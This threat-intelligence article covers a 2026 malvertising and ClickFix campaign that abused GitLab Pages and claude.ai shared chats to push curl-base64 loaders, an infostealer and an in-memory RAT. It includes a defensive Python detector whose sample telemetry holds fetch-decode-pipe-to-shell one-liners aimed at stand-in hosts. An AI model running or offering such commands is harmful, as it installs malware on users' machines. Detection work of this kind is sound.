Sophisticated Malvertising and Social Engineering Campaign Exploits AI Development Platforms
Recent investigations have uncovered a sophisticated campaign encompassing both malvertising and social engineering tactics. This campaign pivoted from weaponized GitLab Pages to manipulating the shared chat feature of claude.ai, allowing operators to deploy an in-memory remote-access trojan (RAT) through a China-themed loader chain. The extent and complexity of the threat have raised alarms among cybersecurity experts.
Tracking Malicious Activities Over Time
From April 8 to June 14, 2026, investigators tracked 106 unique malicious hostnames across six distinct attack waves. The pattern shows the attackers rotating their infrastructure rapidly, maintaining a targeted geographic focus, and continuously testing lure strategies built on AI developer tooling keywords. This careful orchestration illustrates a high level of sophistication.
The attack flow was characterized by a blend of paid search malvertising, legitimate domain abuse, and a form of social engineering known as “ClickFix.” By leveraging genuine advertising channels, the attackers successfully drew in tech-savvy users searching for AI development tools, cleverly impersonating well-known brands such as Claude, ChatGPT Codex, and JetBrains. Victims were then directed to either GitLab Pages subdomains or, later, to claude.ai shared-chat URLs.
Exploiting Trust in High-Reputation Platforms
The attackers’ strategy relied on reputable platforms such as gitlab.io and claude.ai, which allowed them to circumvent domain-based security filters and browser heuristics. Victims unwittingly navigated to legitimate pages served with valid certificates, where conventional defenses that look for URL and certificate anomalies failed to signal any compromise. This manipulation of trust illustrates a significant shift in the tactics adopted by cybercriminals.
In the early phases of this campaign, attackers utilized 92 malicious GitLab Pages hostnames that masqueraded as software download pages. These pages prompted victims with ClickFix instructions, urging them to execute commands in Terminal or PowerShell. As noted by TrendAI™ Research, the operators made continual adjustments to their tactics to optimize their lures and broaden their targeting range.
The Loader Chain’s Intricacies
The command presented by these pages fetched and executed a multi-stage loader hosted on a server controlled by the attackers. This loader, which bore a China-themed motif, was engineered not to install a lasting payload but to enable the execution of an in-memory RAT. This design reduces the opportunity for forensic analysis and complicates detection for endpoint protection solutions that rely on traditional file-based methods.
Tactics Intensify with Abuse of Shared Features
A notable escalation occurred when the attackers weaponized the shared chat feature of claude.ai, creating no fewer than 61 unique shared conversation IDs. Various Google Ads campaigns directed users specifically to claude.ai’s share URLs. Since the malicious code resided on the claude.ai platform itself, defenses that typically flag low-reputation domains became ineffective.
In these shared chats, the attackers mimicked trusted support narratives, employing familiar personas such as "Apple Support" or "Corda Team." They would present curated, seemingly benign instructions, typically involving a single curl command piped through a base64 decode, leading unsuspecting victims to an initial loader script. This script conducted thorough environment checks and, after determining that the machine was not operating with a Russian keyboard layout, would proceed to download and execute a variant of the MacSync infostealer before pivoting to the in-memory RAT stage.
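The one-liner shape described above (a fetch piped through a base64 decode and into a shell) can be hunted for in process command-line telemetry. The following is an added example, not code from TrendAI or from the campaign; the event fields, host names and sample command lines are constructed, and it generalizes slightly to cover wget and command-substitution variants.

```python
import re

# Heuristics for the ClickFix one-liner shape: fetch -> base64 decode -> shell.
FETCH = re.compile(r"\b(?:curl|wget)\b")
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")  # -D is the macOS flag
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:/\S*/)?(?:ba|z|da|k)?sh\b")
SUBST_EXEC = re.compile(r"\b(?:(?:ba|z)?sh\s+-c|eval)\s+[\"']?\$\(")


def classify(cmdline):
    """Return 'high', 'medium' or 'none' for one process command line."""
    fetch = bool(FETCH.search(cmdline))
    decode = bool(B64_DECODE.search(cmdline))
    executes = bool(PIPE_TO_SHELL.search(cmdline) or SUBST_EXEC.search(cmdline))
    if not executes:
        return "none"        # downloading or decoding alone is routine
    if fetch and decode:
        return "high"        # full fetch -> decode -> execute chain
    return "medium" if (fetch or decode) else "none"


def triage(events):
    """Return (host, severity) pairs for flagged events, highest severity first."""
    order = {"high": 0, "medium": 1}
    hits = [(e["host"], classify(e["cmdline"])) for e in events]
    return sorted((h for h in hits if h[1] != "none"), key=lambda h: order[h[1]])


# Constructed sample telemetry (hypothetical hosts, reserved .invalid domains).
SAMPLE_EVENTS = [
    {"host": "mac-01",
     "cmdline": "curl -fsSL https://downloads.example.invalid/setup | base64 -d | bash"},
    {"host": "mac-02",
     "cmdline": "echo PLACEHOLDER_B64 | base64 -D | sh"},
    {"host": "mac-03",
     "cmdline": '/bin/zsh -c "$(curl -fsSL https://cdn.example.invalid/i | base64 --decode)"'},
    {"host": "mac-04",
     "cmdline": "curl -fsSL https://releases.example.invalid/tool.tgz -o /tmp/tool.tgz"},
    {"host": "mac-05",
     "cmdline": "base64 -d cert.b64 > cert.der"},
    {"host": "mac-06",
     "cmdline": "curl -s https://get.example.invalid/install.sh | sh"},
]

if __name__ == "__main__":
    for host, severity in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {host}")
```

The "medium" tier also matches ordinary pipe-to-shell installers, so it is best treated as a review queue rather than an alert.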
The dual-use infrastructure also served Mac utility scams, showcasing the attackers’ strategic diversification to maximize click-through rates and expand their reach.
Geographical Focus and Victim Distribution
Geographically, the campaign disproportionately impacted the Asia-Pacific region, which accounted for approximately 67% of confirmed victims, with Taiwan representing roughly 30.5% of the overall traffic. This concentration clearly indicates deliberate geo-targeting strategies in Google Ads and the iterative testing of keywords across various AI brands to optimize engagement.
As the attacks progressed, operators continuously rotated campaign parameters and pages each week, leveraging performance analytics to refine their lures and broaden their targeting, eventually extending their reach to countries including Singapore, India, and various European nations.
Immediate Mitigation Responses
In response to these alarming activities, the AI platform operator, Anthropic, took swift action to remove the malicious shared conversations, banning the accounts involved and instituting further protections against such abuses in shared chats. TrendAI™ continues to monitor the evolving campaign and recommends rapid defensive measures, including disabling risky copy-paste execution workflows, educating users about ClickFix-style prompts, implementing script-blocking mechanisms, and conducting vigilant monitoring for in-memory RAT indicators.
The evolving threat landscape showcases the necessity for organizations and individuals to maintain a heightened awareness and adopt robust cybersecurity practices.

